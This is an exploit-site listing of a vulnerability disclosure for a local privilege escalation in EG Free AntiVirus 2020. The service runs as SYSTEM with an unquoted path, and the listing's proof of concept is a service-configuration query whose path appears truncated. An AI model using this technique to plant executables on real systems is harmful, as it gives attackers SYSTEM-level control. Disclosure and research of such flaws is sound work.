EG Free AntiVirus 2020 Privilege Escalation / Unquoted Service Path

CVE Category Price Severity
CVE-2021-46439 CWE-428 $5000 High
Author Risk Exploitation Type Date
Unknown High Local 2022-04-05
CVSS:4.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

EG Free AntiVirus 2020 Privilege Escalation / Unquoted Service Path
# Exploit Title: EG Free AntiVirus v2020 - Unquoted Service Path (Local Privilege Escalation)
# Date: 24/01/2022
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage:
# Software Link:
# Version: 2020
# Tested: Windows 10 (x64)
# CVE: CVE-2021-46439


EG Free AntiVirus (v2020) installs a service (WinSEGAV AutoConfig) with
an unquoted service path. Since this service is running as SYSTEM, it
creates a local privilege escalation vulnerability. To properly exploit
this vulnerability, a local attacker must insert an executable in the
path of the service. Rebooting the system or restarting the service
will run the malicious executable with elevated privileges.

Proof of Concept:

C:\Users\shah>sc qc  WinSEGAV AutoConfig
[SC] QueryServiceConfig SUCCESS

        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\EGSoftWeb\EG Anti
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Windows Service For EG Free AntiVirus
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Best regards,
Shahrukh Iqbal Mirza.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum